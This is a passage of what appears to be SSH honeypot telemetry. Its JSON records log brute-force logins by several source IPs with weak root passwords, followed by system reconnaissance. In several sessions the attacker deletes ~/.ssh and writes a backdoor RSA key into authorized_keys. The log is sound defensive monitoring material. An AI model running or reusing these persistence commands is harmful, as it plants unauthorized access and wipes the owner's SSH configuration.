\"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "bac7c1cee115",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:38:28.260571Z",
"end_time": "2026-06-30T16:38:29.136577Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "718dcb3a39e2",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:38:26.280393Z",
"end_time": "2026-06-30T16:38:28.134386Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Pw@123456
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "e723426a4c04",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:38:24.395022Z",
"end_time": "2026-06-30T16:38:29.133633Z",
"duration": "4.7",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Pw@123456"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "de5151ad2592",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:35:18.005638Z",
"end_time": "2026-06-30T16:35:19.053001Z",
"duration": "1.0",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "b877f4cb4b4c",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:35:16.010373Z",
"end_time": "2026-06-30T16:35:17.863995Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Qaz147369
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "14149db9f003",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:35:13.985100Z",
"end_time": "2026-06-30T16:35:19.056101Z",
"duration": "5.1",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Qaz147369"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sftpuser
{
"id": "a530f7646f9c",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:32:02.916639Z",
"end_time": "2026-06-30T16:32:04.747641Z",
"duration": "1.8",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "sftpuser",
"pass": "12345"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: user / 3245gs5662d34
{
"id": "047f1819bee4",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:30:42.850449Z",
"end_time": "2026-06-30T16:30:43.925583Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "154d8b0e54b5",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:30:40.626685Z",
"end_time": "2026-06-30T16:30:42.681863Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: user / asdfg
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "506f7dbd9f03",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:30:38.362207Z",
"end_time": "2026-06-30T16:30:43.922533Z",
"duration": "5.6",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": "asdfg"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "609a714de5ac",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:30:32.208154Z",
"end_time": "2026-06-30T16:30:32.375911Z",
"duration": "0.2",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "6720a7c1b5ed",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:29:43.045033Z",
"end_time": "2026-06-30T16:29:44.512271Z",
"duration": "1.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "e6836f2957c9",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:29:40.475415Z",
"end_time": "2026-06-30T16:29:42.808187Z",
"duration": "2.3",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 222000
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "4f91ee020e43",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:29:37.751243Z",
"end_time": "2026-06-30T16:29:44.508331Z",
"duration": "6.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "222000"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "19c471d51742",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:29:12.525036Z",
"end_time": "2026-06-30T16:29:13.397777Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}